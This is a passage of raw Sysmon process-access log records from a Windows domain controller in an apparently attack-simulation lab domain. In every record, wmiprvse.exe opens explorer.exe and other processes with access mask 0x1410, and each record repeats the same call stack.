|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.138{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 